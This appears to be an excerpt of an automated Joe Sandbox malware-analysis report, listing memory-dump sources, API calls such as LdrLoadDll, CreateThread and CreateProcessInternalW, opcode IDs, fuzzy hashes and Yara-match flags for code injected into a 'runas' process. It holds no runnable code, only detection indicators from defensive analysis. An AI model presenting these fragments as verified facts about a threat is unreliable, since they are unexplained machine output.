                                                                                                              • Instruction ID: e23305e6e39b5a278607c849af1e2effe11b71d8b1691ab37c7077612871e38a
                                                                                                              • Opcode Fuzzy Hash: bb967f8c92928b2207bc6010ba68847709ef909c993a3ac4170f44aacee31856
                                                                                                              • Instruction Fuzzy Hash: D590023120140413F1157158450470701999BD0256F99C412B0429558D9656DA52B121
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: aac8ae14f95f57e6e3bd8450010b8df0df45538b3d36de9c1e1901e08edcb04b
                                                                                                              • Instruction ID: 76b345ba41ae322e4ad0a4a9710a3c310735b3e57ad598379f52aedc6d7e429a
                                                                                                              • Opcode Fuzzy Hash: aac8ae14f95f57e6e3bd8450010b8df0df45538b3d36de9c1e1901e08edcb04b
                                                                                                              • Instruction Fuzzy Hash: F290026120180403F1447558480460701959BD0317F59C011B2069555E8A29DD517135
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 1891d4babb2d77f27013ea5d39b269951e5547e0f69c9d7b5f9ad379e8c8de75
                                                                                                              • Instruction ID: d6a699d390f694db1d5bd6ce7fb358daeee116b8bd4b522d37b18e3b41ac2099
                                                                                                              • Opcode Fuzzy Hash: 1891d4babb2d77f27013ea5d39b269951e5547e0f69c9d7b5f9ad379e8c8de75
                                                                                                              • Instruction Fuzzy Hash: F390022160140503F10571584404616019A9BD0256F99C022B1029555ECA25DA92B131
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: f48de0c29518653c6a7ec98e210b5cc270d8f8b220913cdc5ef3eb13c2258545
                                                                                                              • Instruction ID: b1f3592564fb48b5cb61e5fe8c3911d0a363e4a44ceb408ca28436bd8e9b63aa
                                                                                                              • Opcode Fuzzy Hash: f48de0c29518653c6a7ec98e210b5cc270d8f8b220913cdc5ef3eb13c2258545
                                                                                                              • Instruction Fuzzy Hash: 4790026134140443F10471584414B060195DBE1316F59C015F1069554D8619DD527126
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 99fc6342af0242a505f9c4ac6801c21d58a190c50719e0bb9522f3bcc5ec3883
                                                                                                              • Instruction ID: 418c4adfac024a06c20530e9c64cc0be6e7aa7cf835f7a6e5fbc321d7ca415d3
                                                                                                              • Opcode Fuzzy Hash: 99fc6342af0242a505f9c4ac6801c21d58a190c50719e0bb9522f3bcc5ec3883
                                                                                                              • Instruction Fuzzy Hash: D7900221211C0043F20475684C14B0701959BD0317F59C115B0159554CC915D9617521
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 8a0225dc2883d584f1b364f9ff7017d352c525720d27f6b1e1903b98b4328052
                                                                                                              • Instruction ID: 0afdb0537b4ae6efc435512f5d883b466c9a84344eb73843eea2ec06c1a31ca3
                                                                                                              • Opcode Fuzzy Hash: 8a0225dc2883d584f1b364f9ff7017d352c525720d27f6b1e1903b98b4328052
                                                                                                              • Instruction Fuzzy Hash: F2900221601400436144716888449064195BFE1226759C121B099D550D8559D9657665
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: de56911a1b24eae7068f54205c488e384f8685bfc149af719681a3077cc1fb80
                                                                                                              • Instruction ID: bcea3a3c0185a6b1f6a67a7c91568c7f9f7b6eb3a1556a17f6acb563adc57e37
                                                                                                              • Opcode Fuzzy Hash: de56911a1b24eae7068f54205c488e384f8685bfc149af719681a3077cc1fb80
                                                                                                              • Instruction Fuzzy Hash: 35900225211400032109B558070450701D69BD5366359C021F101A550CD621D9617121
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: e9150a74b8b4a586524e1597d61098d0be29da7416f80641e47f977f331f7139
                                                                                                              • Instruction ID: 8c61b5ed54f22242550236e1dbd5de14ced795ecbf28a582f62377afceff8b28
                                                                                                              • Opcode Fuzzy Hash: e9150a74b8b4a586524e1597d61098d0be29da7416f80641e47f977f331f7139
                                                                                                              • Instruction Fuzzy Hash: 1E900225221400032149B558060450B05D5ABD6366399C015F141B590CC621D9657321
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 2773588e70b3221ef7e17e832d2d785019bd62c4e6500ad2945a9354d63a380e
                                                                                                              • Instruction ID: a6ae747fcb0396347e41478de7f599ccb5306697836d13a3fd28f0636597fcec
                                                                                                              • Opcode Fuzzy Hash: 2773588e70b3221ef7e17e832d2d785019bd62c4e6500ad2945a9354d63a380e
                                                                                                              • Instruction Fuzzy Hash: BB90026120240003610971584414616419A9BE0216B59C021F1019590DC525D9917125
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 20060c528361a643edd84c0bb427e347a36ce4311ade8f358ca5306c3de5657d
                                                                                                              • Instruction ID: 9cafc87abf087154507163519027a171e2c0d2c5e400e687fb919515b26df9e2
                                                                                                              • Opcode Fuzzy Hash: 20060c528361a643edd84c0bb427e347a36ce4311ade8f358ca5306c3de5657d
                                                                                                              • Instruction Fuzzy Hash: F890023120140803F1847158440464A01959BD1316F99C015B002A654DCA15DB5977A1
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 5ffdf7f3cfd1a313cc46a276d9f9faad59d9d367423922c9fd3167008cccbcf4
                                                                                                              • Instruction ID: 66d876fe8852c70e838b1cc7cb78ae9dc0716879b0c17399155fb5f20ce8041b
                                                                                                              • Opcode Fuzzy Hash: 5ffdf7f3cfd1a313cc46a276d9f9faad59d9d367423922c9fd3167008cccbcf4
                                                                                                              • Instruction Fuzzy Hash: 2B90023120544843F14471584404A4601A59BD031AF59C011B0069694D9625DE55B661
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: ed2d5a33ad0b4c977931923a27a42ffe1702b456c229cd38a002671cd8b568e4
                                                                                                              • Instruction ID: 4f914c2d65196c8d16f1f5c1b6d358111b4bef8beb4e635ae428267797499eb4
                                                                                                              • Opcode Fuzzy Hash: ed2d5a33ad0b4c977931923a27a42ffe1702b456c229cd38a002671cd8b568e4
                                                                                                              • Instruction Fuzzy Hash: F090023160540803F1547158441474601959BD0316F59C011B0029654D8755DB5576A1
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 2b202b633bbb1c6b2dff7e419f25015d785a27b11f165252d71ddadbc21585a0
                                                                                                              • Instruction ID: 69eb2fcc079ee864beaaa463f0c9eeed266050d0edbdaf6ba10547cb58f211ad
                                                                                                              • Opcode Fuzzy Hash: 2b202b633bbb1c6b2dff7e419f25015d785a27b11f165252d71ddadbc21585a0
                                                                                                              • Instruction Fuzzy Hash: E790023160550403F1047158451470611959BD0216F69C411B0429568D8795DA5175A2
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 8c3f1471877b312f89850eb5587723422a61bf0b052076a4860b74c648c6af43
                                                                                                              • Instruction ID: dcfb6e4e7b3865686d3bf0ddaa070d56390dd9cd08e952396c48aa39713406ea
                                                                                                              • Opcode Fuzzy Hash: 8c3f1471877b312f89850eb5587723422a61bf0b052076a4860b74c648c6af43
                                                                                                              • Instruction Fuzzy Hash: 0E90022124545103F154715C44046164195BBE0216F59C021B0819594D8555D9557221
                                                                                                              APIs
                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 00513E2B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Sleep
                                                                                                              • String ID: net.dll$wininet.dll
                                                                                                              • API String ID: 3472027048-1269752229
                                                                                                              • Opcode ID: 78f39cce84dc34b10c0423e31c2e0c7d5db74fbcfdaa9ac785b08b259528025a
                                                                                                              • Instruction ID: 31b6074fa1bd2f4f309b500602e2123db29d156647fe180f290201dd9265197f
                                                                                                              • Opcode Fuzzy Hash: 78f39cce84dc34b10c0423e31c2e0c7d5db74fbcfdaa9ac785b08b259528025a
                                                                                                              • Instruction Fuzzy Hash: 263150B1A00306BBE714DF64C885FEBBBB9FB84754F04451DF6196B241D7746A40CBA4
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InitializeUninitialize
                                                                                                              • String ID: @J7<
                                                                                                              • API String ID: 3442037557-2016760708
                                                                                                              • Opcode ID: 024e41c3443e1c742c29d0eb988911072b4869f3f3b8d86ec47da04d6b61bf15
                                                                                                              • Instruction ID: 3083a3605316810e4e45f50d4a81496a024063a2b89203637b9f10bd2971cb03
                                                                                                              • Opcode Fuzzy Hash: 024e41c3443e1c742c29d0eb988911072b4869f3f3b8d86ec47da04d6b61bf15
                                                                                                              • Instruction Fuzzy Hash: 8B313275A0060AAFDB10DFD8D8809EFB7B9FF88304B108559E505E7254D775EE45CBA0
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InitializeUninitialize
                                                                                                              • String ID: @J7<
                                                                                                              • API String ID: 3442037557-2016760708
                                                                                                              • Opcode ID: 83b565ed50ab540c01ea2aa686d55c910cfa550a1527ec7d5235f224f2ae047e
                                                                                                              • Instruction ID: 8b817d8137c6352332aa4b19e2cffd80488d1616c2b6d02355924eeb70fa4423
                                                                                                              • Opcode Fuzzy Hash: 83b565ed50ab540c01ea2aa686d55c910cfa550a1527ec7d5235f224f2ae047e
                                                                                                              • Instruction Fuzzy Hash: 0C3130B5A0060AAFDB10DFD8C8809EFB7B9FF88304B108559E505EB254D775EE45CBA0
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 005048B2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID: |xle
                                                                                                              • API String ID: 2234796835-379029741
                                                                                                              • Opcode ID: 910679a9904b8069b1d51d486db6c279e02f9d7234766a7e3e118b20bf22d700
                                                                                                              • Instruction ID: ff903a5fec708f679fd15aa72917deca01530a175333e4eb5b947d351c1dc258
                                                                                                              • Opcode Fuzzy Hash: 910679a9904b8069b1d51d486db6c279e02f9d7234766a7e3e118b20bf22d700
                                                                                                              • Instruction Fuzzy Hash: 7F213AB6504646DFDB14CA14E885BAEFFB5FF84354B10C969D505DB180D331DA46CBA0
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 005048B2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID: |xle
                                                                                                              • API String ID: 2234796835-379029741
                                                                                                              • Opcode ID: e4fe23eff29353edba087925b584054d096c447138b5cb241e71bf32c61b0e01
                                                                                                              • Instruction ID: bcde00ba9c49714dca0d458c38b8c61857efc9ec534968de220edf04821019da
                                                                                                              • Opcode Fuzzy Hash: e4fe23eff29353edba087925b584054d096c447138b5cb241e71bf32c61b0e01
                                                                                                              • Instruction Fuzzy Hash: CF0152B5D4020EBBEF10DAA0DC46FDDBBB9AF54308F008594EA0897281F631EB44CB91
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 005048B2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID: |xle
                                                                                                              • API String ID: 2234796835-379029741
                                                                                                              • Opcode ID: d25f39db3afd783deaab873e3bcf30208ff7f0e248ea19beb78da20a5af16b63
                                                                                                              • Instruction ID: db8f8edf32748364c47e7d66d672e7191b5687ba9f03d54effe19739da37f012
                                                                                                              • Opcode Fuzzy Hash: d25f39db3afd783deaab873e3bcf30208ff7f0e248ea19beb78da20a5af16b63
                                                                                                              • Instruction Fuzzy Hash: 8AE0266290420C7AD720A549AC47F6FBF5DFB80345F008695FE0C81180D5606C6099F2
                                                                                                              APIs
                                                                                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,005085DE,00000010,00000000,?,?,00000044,00000000,00000010,005085DE,?,?,00000000), ref: 00519C00
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateInternalProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 2186235152-0
                                                                                                              • Opcode ID: 56eb0e9ba615e6f0ba1c344e72caaad87569098cab80dc5f91bc00001d277163
                                                                                                              • Instruction ID: a17ff8c9a76a23f1bf5eb3d383b5aed044baf7aa505b3e6cd781585a380cd515
                                                                                                              • Opcode Fuzzy Hash: 56eb0e9ba615e6f0ba1c344e72caaad87569098cab80dc5f91bc00001d277163
                                                                                                              • Instruction Fuzzy Hash: 880192B6215148BBCB44DE99DC81EEB77ADAFCC754F418209BA09E3241D634F851CBA4
                                                                                                              APIs
                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 004F9DC5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2422867632-0
                                                                                                              • Opcode ID: 5dfc573520e4da69a29796d4b0a20283220730d3f349390b53d69111d6ea08b0
                                                                                                              • Instruction ID: 1de6c765c550f5c931dee7b240ca351e89a3bb9237c5a1a6d4fd775c8ffed1fd
                                                                                                              • Opcode Fuzzy Hash: 5dfc573520e4da69a29796d4b0a20283220730d3f349390b53d69111d6ea08b0
                                                                                                              • Instruction Fuzzy Hash: DFF0657339030436E33061A9DC02FDB7A5C9BC0BA1F14002AF70DEA5C0D996B94182E9
                                                                                                              APIs
                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 004F9DC5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2422867632-0
                                                                                                              • Opcode ID: 681c58012fc12c654f724cb378707f5535f424563a855994c9408cc3d810c1a6
                                                                                                              • Instruction ID: 40b17500e93b19b131e0539ef5a92a4ed02313a383c052ecd05cbd4cbb19dc11
                                                                                                              • Opcode Fuzzy Hash: 681c58012fc12c654f724cb378707f5535f424563a855994c9408cc3d810c1a6
                                                                                                              • Instruction Fuzzy Hash: 7EE0927278030433E23061A9CC03FDB7A5C9F91B90F15001AFB09EB6C1D996B98183E9
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(00501D19,?,?,00501D19,?YQ,?,?,00501D19,?YQ,00001000,?,?,00000000), ref: 00519AFC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0
                                                                                                              • Opcode ID: 7e3178983a9da5f247ca9c5e6e561463a882993b86938145b26ca526565d38ef
                                                                                                              • Instruction ID: a3215f3cdb4e7cd1bba91b7a5a433c585527fd378a31b4b1ec2e1f36313c1365
                                                                                                              • Opcode Fuzzy Hash: 7e3178983a9da5f247ca9c5e6e561463a882993b86938145b26ca526565d38ef
                                                                                                              • Instruction Fuzzy Hash: E6E06D722002087BD614EE59DC41EDB37ACEFC9710F004409FA08A7242C670B85086B5
                                                                                                              APIs
                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,A7E85651,00000007,00000000,00000004,00000000,005040BA,000000F4), ref: 00519B4F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FreeHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 3298025750-0
                                                                                                              • Opcode ID: f6d78897837eaf5728a722e9d9bcfedcecfa8106b870659041dfb3a614048c7d
                                                                                                              • Instruction ID: 5c34945dc6b62f73500399237829ac5fc129633820fbed75068f4f01e129c3dc
                                                                                                              • Opcode Fuzzy Hash: f6d78897837eaf5728a722e9d9bcfedcecfa8106b870659041dfb3a614048c7d
                                                                                                              • Instruction Fuzzy Hash: F5E06D71200204BBD610EE59DC41FDB77ACEFC5710F004419FA08A7242D630B950C7B8
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 0050864C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188754299-0
                                                                                                              • Opcode ID: 1b2b3e8ccb99ad1f8b639a8c5736c7058d9a08c7c7bc5d7bf467b436ca089585
                                                                                                              • Instruction ID: faff1696678a08c5d7a0ef1f47931c2d6790d26ceec4f2e3a59d0a3adc58cb59
                                                                                                              • Opcode Fuzzy Hash: 1b2b3e8ccb99ad1f8b639a8c5736c7058d9a08c7c7bc5d7bf467b436ca089585
